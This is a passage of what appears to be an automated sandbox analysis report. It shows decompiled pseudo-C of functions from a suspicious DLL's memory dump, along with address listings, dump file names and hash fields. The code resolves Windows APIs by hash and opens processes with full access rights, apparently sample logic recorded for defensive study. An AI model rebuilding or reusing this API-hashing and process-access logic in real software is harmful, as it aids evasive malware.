										 *((intOrPtr*)(_t439 + 0xa0)) = E6E9EF4E0( *((intOrPtr*)(_t439 + 8)), _t422);
										E6E9F38C8( *((intOrPtr*)(_t439 + 0xac)),  *((intOrPtr*)(_t439 + 0xa4)), E6E9EF4F0( *((intOrPtr*)(_t439 + 4))) - _t422);
										_t439 = _t439 + 0xc;
									}
									E6E9EF84C( *((intOrPtr*)(_t439 + 8)), E6E9EF4F0( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t33 =  &(_t308[7]);
									 *_t33 = _t308[7] - 1;
									__eflags =  *_t33;
								}
								_t434 = _t434 - 1;
								__eflags = _t434;
								goto L20;
							}
							_t421 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E6E9EF4E0(_t439 + 0x28, _t421 * 4));
								__eflags = _t392 -  *_t404;
								if(_t392 ==  *_t404) {
									break;
								}
								_t421 = _t421 + 1;
								__eflags = _t421 -  *(_t439 + 0x7c);
								if(_t421 <  *(_t439 + 0x7c)) {
									continue;
								}
								goto L11;
							}
							__eflags = _t421 - 0xffffffff;
							if(_t421 == 0xffffffff) {
								goto L11;
							}
							L20:
							_t434 = _t434 + 1;
							__eflags = _t434 - _t308[1];
						} while (_t434 < _t308[1]);
						goto L21;
					}
				}
			}

0x6e9ea536
0x6e9ea538
0x6e9ea543
0x6e9ea549
0x6e9ea54d
0x6e9ea552
0x6e9ea558
0x6e9ea568
0x00000000
0x6e9ea56a
0x6e9ea56a
0x6e9ea575
0x6e9ea575
0x6e9eaaf3
0x6e9eaaf5
0x6e9eaaf6
0x6e9eab35
0x6e9eab39
0x6e9eab47
0x6e9eab55
0x6e9eab55
0x6e9eab40
0x6e9eab5b
0x6e9eab60
0x00000000
0x6e9eab60
0x6e9eab44
0x6e9eab45
0x00000000
0x6e9ea57f
0x6e9ea57f
0x6e9ea583
0x6e9ea68a
0x6e9ea68a
0x6e9ea68f
0x6e9ea7a0
0x6e9ea7a4
0x6e9ea7a9
0x6e9ea7ad
0x6e9ea8d7
0x6e9ea8d9
0x6e9ea8dd
0x6e9ea8e6
0x6e9ea8ef
0x6e9ea8f3
0x6e9ea8fc
0x6e9ea903
0x6e9ea904
0x6e9ea908
0x6e9ea90c
0x6e9ea910
0x6e9ea912
0x6e9eaa7c
0x6e9eaa7c
0x6e9eaa84
0x6e9eaa9c
0x6e9eaa9e
0x6e9eaaa0
0x6e9eaada
0x6e9eaada
0x6e9eaadc
0x6e9eaadc
0x6e9eaadf
0x6e9eaafa
0x6e9eab0e
0x6e9eab11
0x6e9eab16
0x6e9eab21
0x6e9eab22
0x6e9eab25
0x6e9eab27
0x6e9eab30
0x00000000
0x6e9eab30
0x6e9eaae1
0x6e9eaae5
0x6e9eaaee
0x00000000
0x6e9eaaee
0x6e9eaab1
0x6e9eaac1
0x6e9eaac5
0x6e9eaac5
0x6e9eaac8
0x6e9eaacb
0x6e9eaace
0x6e9eaad4
0x00000000
0x00000000
0x00000000
0x6e9eaad6
0x6e9ea91a
0x6e9ea91a
0x6e9ea91c
0x6e9ea920
0x6e9ea925
0x6e9ea927
0x6e9ea92b
0x6e9ea92e
0x6e9ea936
0x6e9ea938
0x00000000
0x00000000
0x6e9ea94f
0x6e9ea96a
0x6e9ea96c
0x6e9ea97f
0x6e9ea981
0x6e9ea983
0x6e9ea99e
0x6e9ea99e
0x6e9ea9a2
0x6e9ea9a4
0x00000000
0x00000000
0x6e9ea9a6
0x6e9ea9a9
0x6e9ea9ca
0x6e9ea9e9
0x6e9ea9ef
0x6e9ea9f2
0x6e9ea9f7
0x6e9ea9f8
0x6e9ea9fc
0x00000000
0x00000000
0x6e9eaa04
0x6e9eaa04
0x6e9eaa06
0x6e9eaa12
0x6e9eaa1e
0x6e9eaa28
0x6e9eaa2b
0x6e9eaa2e
0x6e9eaa32
0x6e9eaa39
0x6e9eaa3d
0x6e9eaa41
0x6e9eaa42
0x6e9eaa46
0x6e9eaa4b
0x6e9eaa50
0x6e9eaa54
0x6e9eaa58
0x6e9eaa5e
0x6e9eaa64
0x6e9eaa6a
0x6e9eaa70
0x6e9eaa75
0x6e9eaa76
0x6e9eaa76
0x00000000
0x6e9eaa06
0x00000000
0x6e9ea9a9
0x6e9ea987
0x6e9ea998
0x6e9ea99a
0x6e9ea99c
0x00000000
0x00000000
0x00000000
0x6e9ea99c
0x6e9ea9af
0x00000000
0x6e9ea9af
0x6e9ea7b3
0x6e9ea7b6
0x6e9ea7b8
0x00000000
0x00000000
0x6e9ea7c0
0x6e9ea7c0
0x6e9ea7c2
0x6e9ea7c2
0x6e9ea7d3
0x6e9ea7d5
0x6e9ea7d8
0x00000000
0x00000000
0x6e9ea8ce
0x6e9ea8cf
0x6e9ea8d1
0x00000000
0x00000000
0x00000000
0x6e9ea8d1
0x6e9ea7de
0x6e9ea7e1
0x6e9ea7eb
0x6e9ea7f0
0x6e9ea7f2
0x6e9ea7f8
0x6e9ea7ff
0x6e9ea803
0x6e9ea808
0x6e9ea80c
0x6e9eac47
0x6e9eac5b
0x6e9eac7e
0x6e9eac83
0x6e9eac83
0x6e9ea823
0x6e9ea828
0x6e9ea828
0x6e9ea828
0x6e9ea828
0x6e9ea82e
0x6e9ea833
0x6e9ea835
0x6e9ea83a
0x6e9ea841
0x6e9ea846
0x6e9ea848
0x6e9eac05
0x6e9eac16
0x6e9eac30
0x6e9eac35
0x6e9eac35
0x6e9ea85e
0x6e9ea863
0x6e9ea863
0x6e9ea863
0x6e9ea863
0x6e9ea877
0x6e9ea895
0x6e9ea89a
0x6e9ea8aa
0x6e9ea8c7
0x6e9ea8c9
0x6e9ea8c9
0x00000000
0x6e9ea7e1
0x6e9ea697
0x6e9ea697
0x6e9ea699
0x6e9ea6a0
0x6e9ea6ae
0x6e9ea6b0
0x6e9ea6b3
0x6e9ea6ba
0x6e9ea6bc
0x6e9ea6ed
0x6e9ea6fc
0x6e9ea6fe
0x6e9ea700
0x6e9ea71e
0x6e9ea720
0x6e9ea722
0x6e9ea735
0x6e9ea754
0x6e9ea75a
0x6e9ea75d
0x6e9ea774
0x6e9ea790
0x6e9ea792
0x6e9ea792
0x6e9ea792
0x6e9ea792
0x6e9ea722
0x00000000
0x6e9ea700
0x6e9ea6c0
0x6e9ea6c0
0x6e9ea6c2
0x6e9ea6d3
0x6e9ea6d5
0x6e9ea6d7
0x00000000
0x00000000
0x6e9ea6e3
0x6e9ea6e4
0x6e9ea6eb
0x00000000
0x00000000
0x00000000
0x6e9ea6eb
0x6e9ea6d9
0x6e9ea6dc
0x00000000
0x00000000
0x6e9ea795
0x6e9ea795
0x6e9ea796
0x6e9ea796
0x00000000
0x6e9ea589
0x6e9ea58b
0x6e9ea58b
0x6e9ea58d
0x6e9ea594
0x6e9ea5a2
0x6e9ea5a4
0x6e9ea5a8
0x6e9ea5ac
0x6e9ea5ae
0x6e9ea5dc
0x6e9ea5df
0x6e9ea5e4
0x6e9ea5e8
0x6e9ea5ed
0x6e9ea5f4
0x6e9ea5f9
0x6e9ea5fb
0x6e9eabc2
0x6e9eabd3
0x6e9eabf3
0x6e9eabf8
0x6e9eabf8
0x6e9ea611
0x6e9ea616
0x6e9ea616
0x6e9ea616
0x6e9ea616
0x6e9ea628
0x6e9ea62a
0x6e9ea62c
0x6e9ea63d
0x6e9ea63d
0x6e9ea643
0x6e9ea648
0x6e9ea64c
0x6e9ea652
0x6e9ea659
0x6e9ea65e
0x6e9ea660
0x6e9eab76
0x6e9eab87
0x6e9eaba8
0x6e9eabad
0x6e9eabad
0x6e9ea677
0x6e9ea67c
0x6e9ea67c
0x6e9ea67c
0x6e9ea67c
0x6e9ea67f
0x6e9ea67f
0x00000000
0x6e9ea67f
0x6e9ea5b2
0x6e9ea5b2
0x6e9ea5b4
0x6e9ea5c5
0x6e9ea5c7
0x6e9ea5c9
0x00000000
0x00000000
0x6e9ea5d5
0x6e9ea5d6
0x6e9ea5da
0x00000000
0x00000000
0x00000000
0x6e9ea5da
0x6e9ea5cb
0x6e9ea5ce
0x00000000
0x00000000
0x6e9ea680
0x6e9ea680
0x6e9ea681
0x6e9ea681
0x00000000
0x6e9ea58d
0x6e9ea583

Strings

, xrefs: 6E9EAB3B

Memory Dump Source

Source File: 00000004.00000002.692542013.000000006E9E1000.00000020.00020000.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000004.00000002.692531722.000000006E9E0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.692700485.000000006E9FA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.692717910.000000006E9FD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.692774926.000000006E9FF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 6f8f735d7600623ab8b0b8d91e8b401a62b53f2eebfceeedcedf2721bf958b05
Instruction ID: c3dbb0c38b8dbe654c77d8e1c4d0d905f0a4fbeada1d2e7b451c577dd02353d8
Opcode Fuzzy Hash: 6f8f735d7600623ab8b0b8d91e8b401a62b53f2eebfceeedcedf2721bf958b05
Instruction Fuzzy Hash: 711272715083019FC726DFA4D840AAEB7B9AFD571CF204A1AE699976A4EB70DC01CF42

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E846C, Relevance: 1.8, Strings: 1, Instructions: 531
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E6E9E846C(signed int* __ecx, intOrPtr __edx, void* __eflags) {
				void* __esi;
				void* __ebp;
				signed int* _t173;
				signed int* _t178;
				void* _t180;
				void* _t181;
				intOrPtr* _t188;
				signed int _t202;
				intOrPtr* _t211;
				intOrPtr* _t212;
				intOrPtr* _t217;
				signed int* _t218;
				void* _t219;
				void* _t220;
				void* _t237;
				void* _t238;
				signed int* _t246;
				void* _t247;
				signed int* _t258;
				intOrPtr* _t269;
				signed int* _t277;
				intOrPtr* _t279;
				void* _t283;
				void* _t285;
				void* _t287;
				signed int* _t296;
				void* _t299;
				signed int* _t308;
				intOrPtr* _t310;
				signed int _t315;
				intOrPtr _t317;
				signed int* _t322;
				signed int _t323;
				signed int _t324;
				void* _t343;
				void* _t414;
				signed int _t415;
				signed int* _t421;
				signed int _t427;
				intOrPtr* _t428;
				intOrPtr* _t429;
				signed int _t431;
				signed int _t433;
				signed int _t437;
				signed int _t438;
				signed int _t439;
				signed int _t442;
				void* _t443;
				signed int _t444;
				void* _t445;
				signed int _t446;
				intOrPtr* _t449;

				 *_t449 = __ecx + 0x1c;
				 *((intOrPtr*)(_t449 + 0x68)) = __edx;
				 *(_t449 + 4) = __ecx;
				 *(_t449 + 0x84) = 0;
				 *((intOrPtr*)(_t449 + 0x78)) = __ecx + 4;
				while(1) {
					_t413 =  *(_t449 + 0x6c);
					E6E9EB69C(_t449 + 0x24,  *(_t449 + 0x6c), 0x7fffffff);
					if(E6E9EF4F4(_t449 + 0x24) == 0) {
						goto L3;
					} else {
						( *(_t449 + 4))[0xb] = 0;
						E6E9EF678(_t449 + 0x24);
					}
					L60:
					_t317 = 0xffffffffffffffff;
					L62:
					if(_t317 != 0) {
						L65:
						return _t317;
					}
					if( *(_t449 + 0x84) != 0x20) {
						E6E9F223C(0x5dc, _t413, _t430);
						 *(_t449 + 0x84) =  *(_t449 + 0x84) + 1;
						continue;
					}
					_t317 = 0xffffffffffffffff;
					goto L65;
					L3:
					__eflags =  *( *(_t449 + 4));
					if( *( *(_t449 + 4)) <= 0) {
						L21:
						__eflags =  *(_t449 + 0x20);
						if( *(_t449 + 0x20) <= 0) {
							L33:
							E6E9EF678(_t449 + 0x24);
							_t173 =  *(_t449 + 4);
							__eflags = _t173[0xb];
							if(_t173[0xb] == 0) {
								L46:
								 *((intOrPtr*)(_t449 + 8)) = 0;
								 *((intOrPtr*)(_t449 + 0xc)) = 0;
								E6E9EF5A8(_t449 + 0x14, 0);
								 *((intOrPtr*)(_t449 + 0x34)) =  *((intOrPtr*)(_t449 + 0x68));
								 *((intOrPtr*)(_t449 + 0x38)) = 0;
								E6E9EF5A8(_t449 + 0x40, 0);
								_t178 =  *(_t449 + 4);
								_t414 = 0x40;
								__eflags = _t178[6] - 0x40;
								_t415 =  <  ? _t178[6] : _t414;
								 *(_t449 + 0x80) = _t415;
								__eflags = _t415;
								if(_t415 <= 0) {
									L57:
									_t413 = E6E9EF4E0(_t449 + 0x14, 0);
									_t180 = E6E9F2928( *((intOrPtr*)(_t449 + 0xc)), _t179, 0x3e8);
									_t132 = _t180 - 0x80; // -128
									_t181 = _t132;
									__eflags = _t181 - 0x3f;
									_t315 =  <=  ? _t181 : _t180;
									__eflags = _t315 - 0x102;
									if(_t315 == 0x102) {
										L59:
										E6E9EB608(_t449 + 0x34);
										E6E9EB608(_t449 + 8);
										goto L60;
									}
									__eflags = _t315 - 0x3f;
									if(_t315 <= 0x3f) {
										__eflags = _t315 << 2;
										 *((intOrPtr*)( *((intOrPtr*)(_t449 + 8)) + 0x2c)) =  *((intOrPtr*)(E6E9EF4E0( *(_t449 + 4), _t315 << 2)));
										_t188 = E6E9EF4E0( *(_t449 + 0x7c), _t315 << 2);
										_t413 =  *(_t449 + 4);
										 *((intOrPtr*)(_t413 + 0x30)) =  *_t188;
										_t317 =  *((intOrPtr*)(_t413 + 0x2c));
										E6E9EB608(_t449 + 0x34);
										E6E9EB608(_t449 + 8);
										goto L62;
									}
									goto L59;
								}
								_t446 = 0;
								__eflags = 0;
								while(1) {
									E6E9ECAD0(_t449 + 0x4c);
									_t413 = 0;
									_t343 = _t449 + 0x4c;
									 *((char*)(_t343 + 4)) = 0;
									 *((intOrPtr*)(_t343 + 0x20)) = 0;
									__eflags = E6E9EC2C4(_t343);
									if(__eflags != 0) {
										break;
									}
									E6E9EF84C(_t449 + 0x14, E6E9EF4F0(_t449 + 0x10) + 4);
									 *((intOrPtr*)(E6E9EF4E0(_t449 + 0x14, E6E9EF4F0(_t449 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t449 + 0x4c));
									 *((intOrPtr*)(_t449 + 0xc)) =  *((intOrPtr*)(_t449 + 0xc)) + 1;
									_t202 = E6E9F303C(0xfe338407, 0xa8c8a645);
									__eflags = _t202;
									if(_t202 == 0) {
										L51:
										_t413 =  *(_t449 + 0x6c);
										__eflags = _t413;
										if(__eflags == 0) {
											break;
										}
										__eflags = _t413 - 0xffffffff;
										if(__eflags != 0) {
											E6E9EF84C(_t449 + 0x40, E6E9EF4F0(_t449 + 0x3c) + 4);
											 *(E6E9EF4E0(_t449 + 0x40, E6E9EF4F0(_t449 + 0x3c) + 0xfffffffc)) =  *(_t449 + 0x6c);
											 *((intOrPtr*)(_t449 + 0x4c - 0x14)) =  *((intOrPtr*)(_t449 + 0x4c - 0x14)) + 1;
											E6E9ECD68(_t449 + 0x4c, __eflags);
											_t446 = _t446 + 1;
											__eflags = _t446 -  *(_t449 + 0x80);
											if(_t446 <  *(_t449 + 0x80)) {
												continue;
											}
											_t431 = 0;
											__eflags = 0;
											do {
												_t211 = E6E9EF4E0( *(_t449 + 4), _t431 * 4);
												_t212 = E6E9EF4E0(_t449 + 0x40, _t431 * 4);
												E6E9E8B9C( *_t211, E6E9F02D4(0xfe338407, 0x1a9c1df5),  *_t212, 0, 0);
												_t431 = _t431 + 1;
												__eflags = _t431 -  *(_t449 + 0x80);
											} while (_t431 <  *(_t449 + 0x80));
											goto L57;
										}
										break;
									}
									_t413 = 0;
									_push(2);
									_push(0);
									_push(0);
									_push(_t449 + 0x6c);
									_push( *((intOrPtr*)(_t449 + 0x78)));
									_push( *((intOrPtr*)(_t449 + 0x60)));
									_push(0xffffffff);
									asm("int3");
									asm("int3");
									__eflags = _t202;
									if(__eflags != 0) {
										break;
									}
									goto L51;
								}
								E6E9ECD68(_t449 + 0x4c, __eflags);
								goto L59;
							}
							_t427 =  *_t173;
							__eflags = _t427;
							if(_t427 <= 0) {
								goto L46;
							}
							_t430 = 0;
							__eflags = 0;
							_t322 =  &(_t173[1]);
							while(1) {
								_t433 = _t430 * 4;
								_t217 = E6E9EF4E0(_t322, _t433);
								_t218 =  *(_t449 + 4);
								__eflags =  *_t217 - _t218[0xc];
								if( *_t217 == _t218[0xc]) {
									break;
								}
								_t430 = _t430 + 1;
								__eflags = _t430 - _t427;
								if(_t430 < _t427) {
									continue;
								}
								goto L46;
							}
							__eflags = _t430 - 0xffffffff;
							if(_t430 != 0xffffffff) {
								_t219 = E6E9EF4F0( *_t449);
								__eflags = _t219 - _t433;
								if(_t219 > _t433) {
									 *((intOrPtr*)(_t449 + 0x74)) = 4 + _t430 * 4;
									_t247 = E6E9EF4F0( *_t449);
									__eflags = _t247 -  *((intOrPtr*)(_t449 + 0x74));
									if(_t247 >  *((intOrPtr*)(_t449 + 0x74))) {
										 *((intOrPtr*)(_t449 + 0x90)) = E6E9EF4E0( *(_t449 + 4), _t433);
										 *((intOrPtr*)(_t449 + 0x8c)) = E6E9EF4E0( *(_t449 + 4),  *((intOrPtr*)(_t449 + 0x74)));
										E6E9F38C8( *((intOrPtr*)(_t449 + 0x98)),  *((intOrPtr*)(_t449 + 0x90)), E6E9EF4F0( *_t449) -  *((intOrPtr*)(_t449 + 0x74)));
										_t449 = _t449 + 0xc;
									}
									E6E9EF84C( *(_t449 + 4), E6E9EF4F0( *_t449) + 0xfffffffc);
									_t421 =  *(_t449 + 4);
									_t75 =  &(_t421[6]);
									 *_t75 = _t421[6] - 1;
									__eflags =  *_t75;
								}
								_t220 = E6E9EF4F0(_t322);
								__eflags = _t220 - _t433;
								if(_t220 > _t433) {
									_t430 = 4 + _t430 * 4;
									_t237 = E6E9EF4F0(_t322);
									__eflags = _t237 - _t430;
									if(_t237 > _t430) {
										_t238 = E6E9EF4E0(_t322, _t433);
										 *((intOrPtr*)(_t449 + 0x94)) = E6E9EF4E0(_t322, _t430);
										E6E9F38C8(_t238,  *((intOrPtr*)(_t449 + 0x98)), E6E9EF4F0(_t322) - _t430);
										_t449 = _t449 + 0xc;
									}
									E6E9EF84C(_t322, E6E9EF4F0(_t322) + 0xfffffffc);
									_t246 =  *(_t449 + 4);
									 *_t246 =  *_t246 - 1;
									__eflags =  *_t246;
								}
								E6E9EF84C( *(_t449 + 4), E6E9EF4F0( *_t449) + 4);
								 *(E6E9EF4E0( *(_t449 + 4), E6E9EF4F0( *_t449) + 0xfffffffc)) = ( *(_t449 + 4))[0xb];
								( *(_t449 + 4))[6] = ( *(_t449 + 4))[6] + 1;
								E6E9EF84C(_t322, E6E9EF4F0(_t322) + 4);
								 *(E6E9EF4E0(_t322, E6E9EF4F0(_t322) + 0xfffffffc)) = ( *(_t449 + 4))[0xc];
								 *( *(_t449 + 4)) =  *( *(_t449 + 4)) + 1;
							}
							goto L46;
						}
						_t323 = 0;
						__eflags = 0;
						do {
							 *(_t449 + 0x7c) = _t323 * 4;
							_t428 = E6E9EF4E0(_t449 + 0x28, _t323 * 4);
							_t258 =  *(_t449 + 4);
							_t430 =  *_t258;
							__eflags = _t430;
							if(_t430 <= 0) {
								L29:
								_t437 = E6E9F303C(0x10154545, 0xc2a75cb8);
								__eflags = _t437;
								if(_t437 != 0) {
									_t439 =  *_t437(0x1fffff, 0,  *((intOrPtr*)(E6E9EF4E0(_t449 + 0x28,  *(_t449 + 0x7c)))));
									__eflags = _t439;
									if(_t439 != 0) {
										E6E9EF84C( *(_t449 + 4), E6E9EF4F0( *_t449) + 4);
										 *(E6E9EF4E0( *(_t449 + 4), E6E9EF4F0( *_t449) + 0xfffffffc)) = _t439;
										 *((intOrPtr*)( *((intOrPtr*)(_t449 + 0x28 - 0x20)) + 0x18)) =  *((intOrPtr*)( *((intOrPtr*)(_t449 + 0x28 - 0x20)) + 0x18)) + 1;
										_t269 = E6E9EF4E0(_t449 + 0x28,  *(_t449 + 0x7c));
										 *(_t449 + 0x70) =  &(( *(_t449 + 4))[1]);
										E6E9EF84C( *((intOrPtr*)(_t449 + 0x74)), E6E9EF4F0( &(( *(_t449 + 4))[1])) + 4);
										 *((intOrPtr*)(E6E9EF4E0( *((intOrPtr*)(_t449 + 0x74)), E6E9EF4F0( *(_t449 + 0x70)) + 0xfffffffc))) =  *_t269;
										_t277 =  *(_t449 + 4);
										 *_t277 =  *_t277 + 1;
										__eflags =  *_t277;
									}
								}
								goto L32;
							}
							_t438 = 0;
							__eflags = 0;
							 *(_t449 + 0x88) =  &(_t258[1]);
							while(1) {
								_t279 = E6E9EF4E0( *((intOrPtr*)(_t449 + 0x8c)), _t438 * 4);
								__eflags =  *_t279 -  *_t428;
								if( *_t279 ==  *_t428) {
									break;
								}
								_t438 = _t438 + 1;
								__eflags = _t438 - _t430;
								if(_t438 < _t430) {
									continue;
								}
								goto L29;
							}
							__eflags = _t438 - 0xffffffff;
							if(_t438 == 0xffffffff) {
								goto L29;
							}
							L32:
							_t323 = _t323 + 1;
							__eflags = _t323 -  *(_t449 + 0x20);
						} while (_t323 <  *(_t449 + 0x20));
						goto L33;
					} else {
						_t324 = 0;
						__eflags = 0;
						do {
							 *(_t449 + 0x64) = _t324 * 4;
							_t429 = E6E9EF4E0( *(_t449 + 0x7c), _t324 * 4);
							_t430 =  *(_t449 + 0x20);
							__eflags = _t430;
							if(_t430 <= 0) {
								L11:
								_t430 =  &(( *(_t449 + 4))[1]);
								_t283 = E6E9EF4F0( &(( *(_t449 + 4))[1]));
								__eflags = _t283 -  *(_t449 + 0x64);
								if(_t283 >  *(_t449 + 0x64)) {
									_t443 = 4 + _t324 * 4;
									_t299 = E6E9EF4F0(_t430);
									__eflags = _t299 - _t443;
									if(_t299 > _t443) {
										 *((intOrPtr*)(_t449 + 0x9c)) = E6E9EF4E0(_t430,  *(_t449 + 0x64));
										 *((intOrPtr*)(_t449 + 0x98)) = E6E9EF4E0(_t430, _t443);
										E6E9F38C8( *((intOrPtr*)(_t449 + 0xa4)),  *((intOrPtr*)(_t449 + 0x9c)), E6E9EF4F0(_t430) - _t443);
										_t449 = _t449 + 0xc;
									}
									E6E9EF84C(_t430, E6E9EF4F0(_t430) + 0xfffffffc);
									_t308 =  *(_t449 + 4);
									 *_t308 =  *_t308 - 1;
									__eflags =  *_t308;
								}
								_t442 = E6E9F303C(0xfe338407, 0x77fa1d17);
								__eflags = _t442;
								if(_t442 != 0) {
									 *_t442( *(E6E9EF4E0( *(_t449 + 4),  *(_t449 + 0x64))));
								}
								_t285 = E6E9EF4F0( *_t449);
								__eflags = _t285 -  *(_t449 + 0x64);
								if(_t285 >  *(_t449 + 0x64)) {
									_t445 = 4 + _t324 * 4;
									_t287 = E6E9EF4F0( *_t449);
									__eflags = _t287 - _t445;
									if(_t287 > _t445) {
										_t430 = E6E9EF4E0( *(_t449 + 4),  *(_t449 + 0x64));
										 *((intOrPtr*)(_t449 + 0xa0)) = E6E9EF4E0( *(_t449 + 4), _t445);
										E6E9F38C8(_t288,  *((intOrPtr*)(_t449 + 0xa4)), E6E9EF4F0( *_t449) - _t445);
										_t449 = _t449 + 0xc;
									}
									E6E9EF84C( *(_t449 + 4), E6E9EF4F0( *_t449) + 0xfffffffc);
									_t296 =  *(_t449 + 4);
									_t33 =  &(_t296[6]);
									 *_t33 = _t296[6] - 1;
									__eflags =  *_t33;
								}
								_t324 = _t324 - 1;
								__eflags = _t324;
								goto L20;
							}
							_t444 = 0;
							__eflags = 0;
							while(1) {
								_t310 = E6E9EF4E0(_t449 + 0x28, _t444 * 4);
								__eflags =  *_t310 -  *_t429;
								if( *_t310 ==  *_t429) {
									break;
								}
								_t444 = _t444 + 1;
								__eflags = _t444 - _t430;
								if(_t444 < _t430) {
									continue;
								}
								goto L11;
							}
							__eflags = _t444 - 0xffffffff;
							if(_t444 == 0xffffffff) {
								goto L11;
							}
							L20:
							_t324 = _t324 + 1;
							__eflags = _t324 -  *( *(_t449 + 4));
						} while (_t324 <  *( *(_t449 + 4)));
						goto L21;
					}
				}
			}

0x6e9e8479
0x6e9e847f
0x6e9e8483
0x6e9e8487
0x6e9e8492
0x6e9e8496
0x6e9e849b
0x6e9e84a3
0x6e9e84b3
0x00000000
0x6e9e84b5
0x6e9e84bd
0x6e9e84c4
0x6e9e84c4
0x6e9e8a17
0x6e9e8a19
0x6e9e8a5a
0x6e9e8a5c
0x6e9e8a6b
0x6e9e8a77
0x6e9e8a77
0x6e9e8a66
0x6e9e8a7d
0x6e9e8a82
0x00000000
0x6e9e8a82
0x6e9e8a6a
0x00000000
0x6e9e84ce
0x6e9e84d2
0x6e9e84d5
0x6e9e85dd
0x6e9e85dd
0x6e9e85e2
0x6e9e8705
0x6e9e8709
0x6e9e870e
0x6e9e8712
0x6e9e8716
0x6e9e884c
0x6e9e884e
0x6e9e8852
0x6e9e885b
0x6e9e8866
0x6e9e886a
0x6e9e8873
0x6e9e8878
0x6e9e887e
0x6e9e887f
0x6e9e8883
0x6e9e8887
0x6e9e888e
0x6e9e8890
0x6e9e89d0
0x6e9e89e1
0x6e9e89e8
0x6e9e89ef
0x6e9e89ef
0x6e9e89f2
0x6e9e89f5
0x6e9e89f8
0x6e9e89fe
0x6e9e8a05
0x6e9e8a09
0x6e9e8a12
0x00000000
0x6e9e8a12
0x6e9e8a00
0x6e9e8a03
0x6e9e8a1c
0x6e9e8a34
0x6e9e8a37
0x6e9e8a3c
0x6e9e8a46
0x6e9e8a49
0x6e9e8a4c
0x6e9e8a55
0x00000000
0x6e9e8a55
0x00000000
0x6e9e8a03
0x6e9e8898
0x6e9e8898
0x6e9e889a
0x6e9e889e
0x6e9e88a3
0x6e9e88a5
0x6e9e88a9
0x6e9e88ac
0x6e9e88b4
0x6e9e88b6
0x00000000
0x00000000
0x6e9e88cd
0x6e9e88e8
0x6e9e88ea
0x6e9e88f8
0x6e9e88fd
0x6e9e88ff
0x6e9e891c
0x6e9e891c
0x6e9e8920
0x6e9e8922
0x00000000
0x00000000
0x6e9e8924
0x6e9e8927
0x6e9e8948
0x6e9e8967
0x6e9e896d
0x6e9e8970
0x6e9e8975
0x6e9e8976
0x6e9e897d
0x00000000
0x00000000
0x6e9e8985
0x6e9e8985
0x6e9e8987
0x6e9e8993
0x6e9e899f
0x6e9e89c1
0x6e9e89c6
0x6e9e89c7
0x6e9e89c7
0x00000000
0x6e9e8987
0x00000000
0x6e9e8927
0x6e9e8901
0x6e9e8907
0x6e9e8909
0x6e9e890a
0x6e9e890b
0x6e9e890c
0x6e9e8910
0x6e9e8914
0x6e9e8916
0x6e9e8917
0x6e9e8918
0x6e9e891a
0x00000000
0x00000000
0x00000000
0x6e9e891a
0x6e9e892d
0x00000000
0x6e9e892d
0x6e9e871c
0x6e9e871e
0x6e9e8720
0x00000000
0x00000000
0x6e9e872a
0x6e9e872a
0x6e9e872c
0x6e9e872f
0x6e9e8731
0x6e9e8739
0x6e9e8740
0x6e9e8744
0x6e9e8747
0x00000000
0x00000000
0x6e9e8843
0x6e9e8844
0x6e9e8846
0x00000000
0x00000000
0x00000000
0x6e9e8846
0x6e9e874d
0x6e9e8750
0x6e9e8759
0x6e9e875e
0x6e9e8760
0x6e9e876c
0x6e9e8770
0x6e9e8775
0x6e9e8779
0x6e9e8b56
0x6e9e8b6a
0x6e9e8b8c
0x6e9e8b91
0x6e9e8b91
0x6e9e878f
0x6e9e8794
0x6e9e8798
0x6e9e8798
0x6e9e8798
0x6e9e8798
0x6e9e879d
0x6e9e87a2
0x6e9e87a4
0x6e9e87a8
0x6e9e87af
0x6e9e87b4
0x6e9e87b6
0x6e9e8b17
0x6e9e8b26
0x6e9e8b3f
0x6e9e8b44
0x6e9e8b44
0x6e9e87c9
0x6e9e87ce
0x6e9e87d2
0x6e9e87d2
0x6e9e87d2
0x6e9e87e4
0x6e9e8805
0x6e9e880d
0x6e9e881b
0x6e9e8839
0x6e9e883f
0x6e9e883f
0x00000000
0x6e9e8750
0x6e9e85e8
0x6e9e85e8
0x6e9e85ea
0x6e9e85f1
0x6e9e85ff
0x6e9e8601
0x6e9e8605
0x6e9e8607
0x6e9e8609
0x6e9e8644
0x6e9e8653
0x6e9e8655
0x6e9e8657
0x6e9e8675
0x6e9e8677
0x6e9e8679
0x6e9e868b
0x6e9e86a9
0x6e9e86b2
0x6e9e86b5
0x6e9e86c3
0x6e9e86d4
0x6e9e86f2
0x6e9e86f4
0x6e9e86f8
0x6e9e86f8
0x6e9e86f8
0x6e9e8679
0x00000000
0x6e9e8657
0x6e9e860f
0x6e9e860f
0x6e9e8614
0x6e9e861b
0x6e9e862a
0x6e9e8631
0x6e9e8633
0x00000000
0x00000000
0x6e9e863f
0x6e9e8640
0x6e9e8642
0x00000000
0x00000000
0x00000000
0x6e9e8642
0x6e9e8635
0x6e9e8638
0x00000000
0x00000000
0x6e9e86fa
0x6e9e86fa
0x6e9e86fb
0x6e9e86fb
0x00000000
0x6e9e84db
0x6e9e84db
0x6e9e84db
0x6e9e84dd
0x6e9e84e4
0x6e9e84f2
0x6e9e84f4
0x6e9e84f8
0x6e9e84fa
0x6e9e8526
0x6e9e852a
0x6e9e852f
0x6e9e8534
0x6e9e8538
0x6e9e853c
0x6e9e8543
0x6e9e8548
0x6e9e854a
0x6e9e8ad9
0x6e9e8ae8
0x6e9e8b07
0x6e9e8b0c
0x6e9e8b0c
0x6e9e855d
0x6e9e8562
0x6e9e8566
0x6e9e8566
0x6e9e8566
0x6e9e8577
0x6e9e8579
0x6e9e857b
0x6e9e858c
0x6e9e858c
0x6e9e8591
0x6e9e8596
0x6e9e859a
0x6e9e859f
0x6e9e85a6
0x6e9e85ab
0x6e9e85ad
0x6e9e8a9b
0x6e9e8aa7
0x6e9e8ac1
0x6e9e8ac6
0x6e9e8ac6
0x6e9e85c3
0x6e9e85c8
0x6e9e85cc
0x6e9e85cc
0x6e9e85cc
0x6e9e85cc
0x6e9e85cf
0x6e9e85cf
